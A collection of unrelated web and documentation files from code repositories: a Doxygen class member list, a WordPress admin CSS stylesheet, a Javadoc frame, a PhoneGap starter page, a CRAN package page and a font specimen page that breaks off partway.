<tr bgcolor="#f0f0f0"><td><b>TCP</b> enum value (defined in <a class="el" href="classArSocket.html">ArSocket</a>)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td></td></tr>
<tr class="memlist"><td><a class="el" href="classArSocket.html#a56">transfer</a>(ArSocket *s)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td><code> [inline]</code></td></tr>
<tr bgcolor="#f0f0f0"><td><b>Type</b> enum name (defined in <a class="el" href="classArSocket.html">ArSocket</a>)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td></td></tr>
<tr bgcolor="#f0f0f0"><td><b>UDP</b> enum value (defined in <a class="el" href="classArSocket.html">ArSocket</a>)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td></td></tr>
<tr bgcolor="#f0f0f0"><td><b>Unknown</b> enum value (defined in <a class="el" href="classArSocket.html">ArSocket</a>)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td></td></tr>
<tr class="memlist"><td><a class="el" href="classArSocket.html#a57">write</a>(const void *buff, size_t len)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td></td></tr>
<tr class="memlist"><td><a class="el" href="classArSocket.html#a58">writeString</a>(const char *str,...)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td></td></tr>
<tr class="memlist"><td><a class="el" href="classArSocket.html#a59">writeStringPlain</a>(const char *str)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td><code> [inline]</code></td></tr>
<tr class="memlist"><td><a class="el" href="classArSocket.html#a60">~ArSocket</a>()</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td></td></tr>
</table><hr size="1"><address style="align: right;"><small>Generated on Thu Jan 7 10:34:44 2010 for Aria by
<a href="http://www.doxygen.org/index.html">
<img src="doxygen.png" alt="doxygen" align="middle" border="0"></a> 1.4.2 </small></address>
</body>
</html>
|
inc/admin/admin-page-class/css/Admin_Page_Class.css | yaroslav-belinsky/Advenced-Custom-Tabs-Woocommerce | /**
* admin pages class
*
* CSS used for the admin pages class and other form items.
*
* Copyright 2011 Ohad Raz (admin@bainternet.info)
*/
/* =Common Rules for all fields.
----------------------------------------------- */
.form-table td.at-field{ border: 1px solid #DDD; padding: 10px 10px 20px; margin: 0px; font-family: "HelveticaNeue-Light","Helvetica Neue Light","Helvetica Neue", Helvetica, Arial, sans-serif; }
.at-label { margin: 0 !important; padding: 5px 0 0 0;
font: 20px/31px "HelveticaNeue-Light","Helvetica Neue Light","Helvetica Neue", Helvetica, Arial, sans-serif;
text-shadow: rgba(255, 255, 255, 1) 0 1px 0; width: auto; }
.at-radio-label{ padding-right: 10px; }
.at-file-upload-label{ clear: both; margin: 5px 0px 5px 1px; }
/* =Form Fields
----------------------------------------------- */
.postbox .at-field input,
.postbox .at-field textarea { padding: 5px; line-height: 18px; }
.postbox .at-field input.at-radio{}
.postbox .at-field input.at-color{ border: 0px; -webkit-border-radius: 5px; -moz-border-radius: 5px; border-radius: 5px; margin-right: 10px; min-width: 100px; }
.at-field input:focus,
.at-field textarea:focus { background: #fffff8; }
#wpcontent select.at-select { min-height: 30px !important; padding: 5px; display: block; min-width: 200px; }
.at-field .desc-field { color: #AAA; font-style: italic; margin: 5px 0 0 3px !important; font-size: 13px; }
.desc-field { background-color: #D9EDF7; border: 1px solid #BCE8F1; color: #3A87AD; padding: 8px 35px 8px 14px;border-radius: 4px 4px 4px 4px;
margin-bottom: 20px;
padding: 8px 35px 8px 14px;
text-shadow: 0 1px 0 rgba(255, 255, 255, 0.5);}
.at-field .wp_themeSkin table.mceLayout{ border: 1px solid #DFDFDF; }
#post-body .at-field .wp_themeSkin .mceStatusbar a.mceResize{ top: -25px; }
/* =Uploaded Images
----------------------------------------------- */
.at-images li { margin: 5px 10px 0px 0; float: left; width: 150px; height: 150px; text-align: center; border: 3px solid #ccc; cursor: move; position: relative; -webkit-border-radius: 3px; -moz-border-radius: 3px; border-radius: 3px; }
.at-images img { width: 150px; height: 150px; }
.at-images a { position: absolute; top: -12px; right: -12px; color: #fff; font-weight: bold; padding: 5px; }
.at-images .at-delete-file img{ width: 16px; height: 16px; }
/* =Upload Button
----------------------------------------------- */
.at-upload-button { float: left; clear: both; margin-top: 10px; }
.at-add-file { float: left; clear: both; margin-top: 10px; }
/* =Time Picker
----------------------------------------------- */
.ui-timepicker-div { font-size: 0.9em; }
.ui-timepicker-div .ui-widget-header { margin-bottom: 8px; }
.ui-timepicker-div dl { text-align: left; }
.ui-timepicker-div dl dt { height: 25px; }
.ui-timepicker-div dl dd { margin: -25px 0 10px 65px; }
.ui-timepicker-div td { font-size: 90%; }
#ui-datepicker-div{display: none;}
/* =Repater Block
----------------------------------------------- */
/* inline */
.at-inline label{font-size: 12px !important;}
.at-inline textarea{height: 130px;width: 200px;}
/* =panel style
----------------------------------------------- */
.wrap{background: none repeat scroll 0 0 #EAEEF3; border: 1px solid #CCCCCC; box-shadow: 0 1px 3px rgba(0, 0, 0, 0.2); margin: 17px 0 40px 10px;width: 800px;border-radius: 6px 6px 6px 6px;}
.header_wrap{border-radius: 6px 6px 6px 6px;background: -moz-linear-gradient(center top , #FEFEFE, #E9EAEE) repeat scroll 0 0 transparent; padding: 5px 20px 10px;}
.footer_wrap{border-radius: 6px 6px 6px 6px;background: -moz-linear-gradient(center top , #E9EAEE,#FEFEFE) repeat scroll 0 0 transparent; padding: 5px 20px 10px;}
.panel_menu{float: left;width: 160px;}
.clearboth{clear: both;}
.f_row{border-bottom: 1px solid #F9F9F9;}
.sections{background: none repeat scroll 0 0 #FFFFFF;float: left;margin-top: 1px;min-height: 520px;padding-bottom: 10px;width: 639px;}
.field{padding: 10px;border-bottom: 1px solid #E9EAEE;}
.sections textarea{background: -moz-linear-gradient(center top , #F9F9F9, #FFFFFF) repeat scroll 0 0 transparent;color: #333333;font-size: 12px;height: 175px;line-height: 1.5em;padding: 4px; width: 390px;}
.sections label{clear: both;display: block;font-size: 12px;font-weight: 700;margin: 0 0 10px;width: 100%;}
.setingstab{min-height: 500px;}
.sections input[type="text"], .sections input[type="password"], .sections input[type="file"], .sections select {background: -moz-linear-gradient(center top , #F9F9F9, #FFFFFF) repeat scroll 0 0 transparent;color: #333333;font-size: 12px;line-height: 1em;padding: 4px;}
.nav_tab_link{ border-color: #DFDFDF #DFDFDF #FFFFFF;border-radius: 3px 3px 0 0;border-style: solid;border-width: 1px 1px 0;color: #AAAAAA;display: inline-block;font-size: 12px;line-height: 16px; margin: 0 6px -1px 0; padding: 4px 14px 6px;text-decoration: none;text-shadow: 0 1px 0 #FFFFFF;}
.nav_tab_link{border: 0 none;border-radius: 0 0 0 0;clear: both;color: #444444;display: block;padding: 10px 20px;width: 100%;}
.nav_tab_link:hover{background: none repeat scroll 0 0 #FFFFFF; border-right: 1px solid #FFFFFF;box-shadow: 0 1px 3px rgba(0, 0, 0, 0.2);color: #666666;font-weight: bold;}
.description{color: #999999;display: block;float: right;font-size: 11px;margin-top: -2px;width: 200px;}
.active_tab{background: none repeat scroll 0 0 #FFFFFF; border-right: 1px solid #FFFFFF;box-shadow: 0 1px 3px rgba(0, 0, 0, 0.2);color: #666666;font-weight: bold;}
.editorcontainer { -webkit-border-radius:6px; border:1px solid #DEDEDE;}
.btn {
-moz-border-bottom-colors: none;
-moz-border-image: none;
-moz-border-left-colors: none;
-moz-border-right-colors: none;
-moz-border-top-colors: none;
background-color: #FAFAFA;
background-image: -moz-linear-gradient(center top , #FFFFFF, #FFFFFF 25%, #E6E6E6);
background-repeat: no-repeat;
border-color: #CCCCCC #CCCCCC #BBBBBB;
border-radius: 4px 4px 4px 4px;
border-style: solid;
border-width: 1px;
box-shadow: 0 1px 0 rgba(255, 255, 255, 0.2) inset, 0 1px 2px rgba(0, 0, 0, 0.05);
color: #333333;
cursor: pointer;
display: inline-block;
font-size: 13px;
line-height: 18px;
padding: 4px 10px;
text-align: center;
text-shadow: 0 1px 1px rgba(255, 255, 255, 0.75);
}
.btn , .btn-info, .btn-info:hover , .btn-primary, .btn-primary:hover , .btn-warning, .btn-warning:hover{
color: #FFFFFF !important;
text-shadow: 0 -1px 0 rgba(0, 0, 0, 0.25);
}
.btn-info {
background-color: #49AFCD !important;
background-image: -moz-linear-gradient(center top , #5BC0DE, #2F96B4);
background-repeat: repeat-x;
border-color: rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.25);
color: #FFFFFF !important;
}
.btn-primary {
background-color: #006DCC !important;
background-image: -moz-linear-gradient(center top , #0088CC, #0044CC);
background-repeat: repeat-x;
border-color: rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.25);
color: #FFFFFF !important;
}
.btn-warning {
background-color: #FAA732;
background-image: -moz-linear-gradient(center top , #FBB450, #F89406);
background-repeat: repeat-x;
border-color: rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.25);
color: #FFFFFF !important;
}
/* alerts */
.alert {
background-color: #FCF8E3;
border: 1px solid #FBEED5;
border-radius: 4px 4px 4px 4px;
margin-bottom: 20px;
padding: 8px 35px 8px 14px;
text-shadow: 0 1px 0 rgba(255, 255, 255, 0.5);
}
.alert, .alert-heading {
color: #C09853;
}
.alert h4 {
font-size: 17px;
margin: 0;
}
.alert-success {
background-color: #DFF0D8;
border-color: #D6E9C6;
}
.alert-success, .alert-success .alert-heading {
color: #468847;
}
.alert-danger, .alert-error {
background-color: #F2DEDE;
border-color: #EED3D7;
color: #B94A48;
}
.alert .close {
line-height: 20px;
position: relative;
right: -21px;
top: -2px;
}
button.close {
background: none repeat scroll 0 0 transparent;
border: 0 none;
cursor: pointer;
padding: 0;
}
.close {
color: #000000;
float: right;
font-size: 20px;
font-weight: bold;
line-height: 20px;
opacity: 0.2;
text-shadow: 0 1px 0 #FFFFFF;
}
/* Sort */
.widget-sort{
background-color: #F5F5F5;
background-image: -moz-linear-gradient(center top , #F9F9F9, #F5F5F5);
border: 1px solid #DFDFDF;
border-radius: 3px 3px 3px 3px;
box-shadow: 0 1px 0 #FFFFFF inset;
padding: 4px;
text-align: center;
width: 65%;
}
.ui-state-highlight{
background-color: #FFFFE0;
border-color: #E6DB55;
border-radius: 3px 3px 3px 3px;
box-shadow: 0 1px 0 #FFFFFF inset;
padding: 14px;
width: 60%;
}
.ui-sortable li{cursor: move;}
.ui-sortable .at-repater-block{cursor: move;}
/* Typo field iris color picker */
.wp-picker-container{height: 20px;}
/* issue #17 number 7 */
div.iris-picker{z-index: 100;}
/* Select 2 typo field Fix*/
.at-typography-size{width: 11%;}
.at-typography-face{width: 30%;}
.hidden{display: none;}
#wpfooter {
position: relative!important;
}
|
doc/com/online/lakeshoremarket/model/partner/package-frame.html | elliottpost/lakeshoremarket | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="en">
<head>
<!-- Generated by javadoc (1.8.0_66) on Tue Dec 08 01:24:03 CST 2015 -->
<title>com.online.lakeshoremarket.model.partner</title>
<meta name="date" content="2015-12-08">
<link rel="stylesheet" type="text/css" href="../../../../../stylesheet.css" title="Style">
<script type="text/javascript" src="../../../../../script.js"></script>
</head>
<body>
<h1 class="bar"><a href="../../../../../com/online/lakeshoremarket/model/partner/package-summary.html" target="classFrame">com.online.lakeshoremarket.model.partner</a></h1>
<div class="indexContainer">
<h2 title="Interfaces">Interfaces</h2>
<ul title="Interfaces">
<li><a href="Partner.html" title="interface in com.online.lakeshoremarket.model.partner" target="classFrame"><span class="interfaceName">Partner</span></a></li>
</ul>
<h2 title="Classes">Classes</h2>
<ul title="Classes">
<li><a href="PartnerImpl.html" title="class in com.online.lakeshoremarket.model.partner" target="classFrame">PartnerImpl</a></li>
</ul>
</div>
</body>
</html>
|
www/index2.html | NatePW/KeyTracker | <!DOCTYPE html>
<!--
Copyright (c) 2012-2014 Adobe Systems Incorporated. All rights reserved.
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an
"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
KIND, either express or implied. See the License for the
specific language governing permissions and limitations
under the License.
-->
<html>
<head>
<meta charset="utf-8" />
<meta name="format-detection" content="telephone=no" />
<meta name="msapplication-tap-highlight" content="no" />
<!-- WARNING: for iOS 7, remove the width=device-width and height=device-height attributes. See https://issues.apache.org/jira/browse/CB-4323 -->
<meta name="viewport" content="user-scalable=no, initial-scale=1, maximum-scale=1, minimum-scale=1, width=device-width, height=device-height, target-densitydpi=device-dpi" />
<link rel="stylesheet" type="text/css" href="css/index.css" />
<title>Hello World</title>
</head>
<body>
<div class="app">
<h1>PhoneGap</h1>
<div id="deviceready" class="blink">
<p class="event listening">Connecting to Device</p>
<p class="event received">Device is Ready</p>
</div>
</div>
<script type="text/javascript" src="phonegap.js"></script>
<script type="text/javascript" src="js/index.js"></script>
<script type="text/javascript">
app.initialize();
</script>
</body>
</html>
|
Code/GetMetaDataFromCRAN/raw_html/Voss.html | esander91/NamespacePollution | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>CRAN - Package Voss</title>
<link rel="stylesheet" type="text/css" href="../../CRAN_web.css" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<style type="text/css">
table td { vertical-align: top; }
</style>
</head>
<body>
<h2>Voss: Generic Voss algorithm (random sequential additions)</h2>
<p>Voss package provides functionality for generating
realizations of a fractal Brownian function on uniform 1D & 2D
grid with classic and generic versions of the Voss algorithm
(random sequential additions)</p>
<table summary="Package Voss summary">
<tr>
<td>Version:</td>
<td>0.1-4</td>
</tr>
<tr>
<td>Depends:</td>
<td>R (≥ 2.14.0), <a href="../fields/index.html">fields</a></td>
</tr>
<tr>
<td>Published:</td>
<td>2012-06-04</td>
</tr>
<tr>
<td>Author:</td>
<td>Pavel V. Moskalev</td>
</tr>
<tr>
<td>Maintainer:</td>
<td>Pavel V. Moskalev <moskalefff at gmail.com></td>
</tr>
<tr>
<td>License:</td>
<td><a href="../../licenses/GPL-3">GPL-3</a></td>
</tr>
<tr>
<td>URL:</td>
<td><a href="http://www.r-project.org">http://www.r-project.org</a></td>
</tr>
<tr>
<td>NeedsCompilation:</td>
<td>no</td>
</tr>
<tr>
<td>CRAN checks:</td>
<td><a href="../../checks/check_results_Voss.html">Voss results</a></td>
</tr>
</table>
<h4>Downloads:</h4>
<table summary="Package Voss downloads">
<tr>
<td> Reference manual: </td>
<td> <a href="Voss.pdf"> Voss.pdf </a> </td>
</tr>
<tr>
<td> Package source: </td>
<td> <a href="../../../src/contrib/Voss_0.1-4.tar.gz"> Voss_0.1-4.tar.gz </a> </td>
</tr>
<tr>
<td> Windows binaries: </td>
<td> r-devel: <a href="../../../bin/windows/contrib/3.5/Voss_0.1-4.zip">Voss_0.1-4.zip</a>, r-release: <a href="../../../bin/windows/contrib/3.4/Voss_0.1-4.zip">Voss_0.1-4.zip</a>, r-oldrel: <a href="../../../bin/windows/contrib/3.3/Voss_0.1-4.zip">Voss_0.1-4.zip</a> </td>
</tr>
<tr>
<td> OS X El Capitan binaries: </td>
<td> r-release: <a href="../../../bin/macosx/el-capitan/contrib/3.4/Voss_0.1-4.tgz">Voss_0.1-4.tgz</a> </td>
</tr>
<tr>
<td> OS X Mavericks binaries: </td>
<td> r-oldrel: <a href="../../../bin/macosx/mavericks/contrib/3.3/Voss_0.1-4.tgz">Voss_0.1-4.tgz</a> </td>
</tr>
</table>
<h4>Linking:</h4>
<p>Please use the canonical form
<a href="https://CRAN.R-project.org/package=Voss"><samp>https://CRAN.R-project.org/package=Voss</samp></a>
to link to this page.</p>
</body>
</html>
|
wp-content/themes/outdoor_cinema/fonts/lovelo_black-demo.html | timjdaniel/outdoor-cinema | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js" type="text/javascript" charset="utf-8"></script>
<script src="specimen_files/easytabs.js" type="text/javascript" charset="utf-8"></script>
<link rel="stylesheet" href="specimen_files/specimen_stylesheet.css" type="text/css" charset="utf-8" />
<link rel="stylesheet" href="stylesheet.css" type="text/css" charset="utf-8" />
<style type="text/css">
body{
font-family: 'loveloblack';
}
</style>
<title>Lovelo Black Regular Specimen</title>
<script type="text/javascript" charset="utf-8">
$(document).ready(function() {
$('#container').easyTabs({defaultContent:1});
});
</script>
</head>
<body>
<div id="container">
<div id="header">
Lovelo Black Regular </div>
<ul class="tabs">
<li><a href="#specimen">Specimen</a></li>
<li><a href="#layout">Sample Layout</a></li>
<li><a href="#glyphs">Glyphs & Languages</a></li>
<li><a href="#installing">Installing Webfonts</a></li>
</ul>
<div id="main_content">
<div id="specimen">
<div class="section">
<div class="grid12 firstcol">
<div class="huge">AaBb</div>
</div>
</div>
<div class="section">
<div class="glyph_range">A​B​C​D​E​F​G​H​I​J​K​L​M​N​O​P​Q​R​S​T​U​V​W​X​Y​Z​a​b​c​d​e​f​g​h​i​j​k​l​m​n​o​p​q​r​s​t​u​v​w​x​y​z​1​2​3​4​5​6​7​8​9​0​&​.​,​?​!​@​(​)​#​$​%​*​+​-​=​:​;</div>
</div>
<div class="section">
<div class="grid12 firstcol">
<table class="sample_table">
<tr><td>10</td><td class="size10">abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ</td></tr>
<tr><td>11</td><td class="size11">abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ</td></tr>
<tr><td>12</td><td class="size12">abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ</td></tr>
<tr><td>13</td><td class="size13">abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ</td></tr>
<tr><td>14</td><td class="size14">abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ</td></tr>
<tr><td>16</td><td class="size16">abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ</td></tr>
<tr><td>18</td><td class="size18">abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ</td></tr>
<tr><td>20</td><td class="size20">abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ</td></tr>
<tr><td>24</td><td class="size24">abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ</td></tr>
<tr><td>30</td><td class="size30">abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ</td></tr>
<tr><td>36</td><td class="size36">abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ</td></tr>
<tr><td>48</td><td class="size48">abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ</td></tr>
<tr><td>60</td><td class="size60">abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ</td></tr>
<tr><td>72</td><td class="size72">abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ</td></tr>
<tr><td>90</td><td class="size90">abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ</td></tr>
</table>
</div>
</div>
<div class="section" id="bodycomparison">
<div id="xheight">
<div class="fontbody">◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼body</div><div class="arialbody">body</div><div class="verdanabody">body</div><div class="georgiabody">body</div></div>
<div class="fontbody" style="z-index:1">
body<span>Lovelo Black Regular</span>
</div>
<div class="arialbody" style="z-index:1">
body<span>Arial</span>
</div>
<div class="verdanabody" style="z-index:1">
body<span>Verdana</span>
</div>
<div class="georgiabody" style="z-index:1">
body<span>Georgia</span>
</div>
</div>
<div class="section psample psample_row1" id="">
<div class="grid2 firstcol">
<p class="size10"><span>10.</span>Aenean lacinia bibendum nulla sed consectetur. Fusce dapibus, tellus ac cursus commodo, tortor mauris condimentum nibh, ut fermentum massa justo sit amet risus. Nullam id dolor id nibh ultricies vehicula ut id elit. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Nulla vitae elit libero, a pharetra augue.</p>
</div>
<div class="grid3">
<p class="size11"><span>11.</span>Aenean lacinia bibendum nulla sed consectetur. Fusce dapibus, tellus ac cursus commodo, tortor mauris condimentum nibh, ut fermentum massa justo sit amet risus. Nullam id dolor id nibh ultricies vehicula ut id elit. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Nulla vitae elit libero, a pharetra augue.</p>
</div>
<div class="grid3">
<p class="size12"><span>12.</span>Aenean lacinia bibendum nulla sed consectetur. Fusce dapibus, tellus ac cursus commodo, tortor mauris condimentum nibh, ut fermentum massa justo sit amet risus. Nullam id dolor id nibh ultricies vehicula ut id elit. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Nulla vitae elit libero, a pharetra augue.</p>
</div>
<div class="grid4">
<p class="size13"><span>13.</span>Aenean lacinia bibendum nulla sed consectetur. Fusce dapibus, tellus ac cursus commodo, tortor mauris condimentum nibh, ut fermentum massa justo sit amet risus. Nullam id dolor id nibh ultricies vehicula ut id elit. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Nulla vitae elit libero, a pharetra augue.</p>
</div>
<div class="white_blend"></div>
</div>
<div class="section psample psample_row2" id="">
<div class="grid3 firstcol">
<p class="size14"><span>14.</span>Aenean lacinia bibendum nulla sed consectetur. Fusce dapibus, tellus ac cursus commodo, tortor mauris condimentum nibh, ut fermentum massa justo sit amet risus. Nullam id dolor id nibh ultricies vehicula ut id elit. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Nulla vitae elit libero, a pharetra augue.</p>
</div>
<div class="grid4">
<p class="size16"><span>16.</span>Aenean lacinia bibendum nulla sed consectetur. Fusce dapibus, tellus ac cursus commodo, tortor mauris condimentum nibh, ut fermentum massa justo sit amet risus. Nullam id dolor id nibh ultricies vehicula ut id elit. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Nulla vitae elit libero, a pharetra augue.</p>
</div>
<div class="grid5">
<p class="size18"><span>18.</span>Aenean lacinia bibendum nulla sed consectetur. Fusce dapibus, tellus ac cursus commodo, tortor mauris condimentum nibh, ut fermentum massa justo sit amet risus. Nullam id dolor id nibh ultricies vehicula ut id elit. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Nulla vitae elit libero, a pharetra augue.</p>
</div>
<div class="white_blend"></div>
</div>
<div class="section psample psample_row3" id="">
<div class="grid5 firstcol">
<p class="size20"><span>20.</span>Aenean lacinia bibendum nulla sed consectetur. Fusce dapibus, tellus ac cursus commodo, tortor mauris condimentum nibh, ut fermentum massa justo sit amet risus. Nullam id dolor id nibh ultricies vehicula ut id elit. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Nulla vitae elit libero, a pharetra augue.</p>
</div>
<div class="grid7">
<p class="size24"><span>24.</span>Aenean lacinia bibendum nulla sed consectetur. Fusce dapibus, tellus ac cursus commodo, tortor mauris condimentum nibh, ut fermentum massa justo sit amet risus. Nullam id dolor id nibh ultricies vehicula ut id elit. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Nulla vitae elit libero, a pharetra augue.</p>
</div>
<div class="white_blend"></div>
</div>
<div class="section psample psample_row4" id="">
<div class="grid12 firstcol">
<p class="size30"><span>30.</span>Aenean lacinia bibendum nulla sed consectetur. Fusce dapibus, tellus ac cursus commodo, tortor mauris condimentum nibh, ut fermentum massa justo sit amet risus. Nullam id dolor id nibh ultricies vehicula ut id elit. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Nulla vitae elit libero, a pharetra augue.</p>
</div>
<div class="white_blend"></div>
</div>
<div class="section psample psample_row1 fullreverse">
<div class="grid2 firstcol">
<p class="size10"><span>10.</span>Aenean lacinia bibendum nulla sed consectetur. Fusce dapibus, tellus ac cursus commodo, tortor mauris condimentum nibh, ut fermentum massa justo sit amet risus. Nullam id dolor id nibh ultricies vehicula ut id elit. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Nulla vitae elit libero, a pharetra augue.</p>
</div>
<div class="grid3">
<p class="size11"><span>11.</span>Aenean lacinia bibendum nulla sed consectetur. Fusce dapibus, tellus ac cursus commodo, tortor mauris condimentum nibh, ut fermentum massa justo sit amet risus. Nullam id dolor id nibh ultricies vehicula ut id elit. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Nulla vitae elit libero, a pharetra augue.</p>
</div>
<div class="grid3">
<p class="size12"><span>12.</span>Aenean lacinia bibendum nulla sed consectetur. Fusce dapibus, tellus ac cursus commodo, tortor mauris condimentum nibh, ut fermentum massa justo sit amet risus. Nullam id dolor id nibh ultricies vehicula ut id elit. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Nulla vitae elit libero, a pharetra augue.</p>
</div>
<div class="grid4">
<p class="size13"><span>13.</span>Aenean lacinia bibendum nulla sed consectetur. Fusce dapibus, tellus ac cursus commodo, tortor mauris condimentum nibh, ut fermentum massa justo sit amet risus. Nullam id dolor id nibh ultricies vehicula ut id elit. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Nulla vitae elit libero, a pharetra augue.</p>
</div>
<div class="black_blend"></div>
</div>
<div class="section psample psample_row2 fullreverse">
<div class="grid3 firstcol">
<p class="size14"><span>14.</span>Aenean lacinia bibendum nulla sed consectetur. Fusce dapibus, tellus ac cursus commodo, tortor mauris condimentum nibh, ut fermentum massa justo sit amet risus. Nullam id dolor id nibh ultricies vehicula ut id elit. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Nulla vitae elit libero, a pharetra augue.</p>
</div>
<div class="grid4">
<p class="size16"><span>16.</span>Aenean lacinia bibendum nulla sed consectetur. Fusce dapibus, tellus ac cursus commodo, tortor mauris condimentum nibh, ut fermentum massa justo sit amet risus. Nullam id dolor id nibh ultricies vehicula ut id elit. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Nulla vitae elit libero, a pharetra augue.</p>
</div>
<div class="grid5">
<p class="size18"><span>18.</span>Aenean lacinia bibendum nulla sed consectetur. Fusce dapibus, tellus ac cursus commodo, tortor mauris condimentum nibh, ut fermentum massa justo sit amet risus. Nullam id dolor id nibh ultricies vehicula ut id elit. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Nulla vitae elit libero, a pharetra augue.</p>
</div>
<div class="black_blend"></div>
</div>
<div class="section psample fullreverse psample_row3" id="">
<div class="grid5 firstcol">
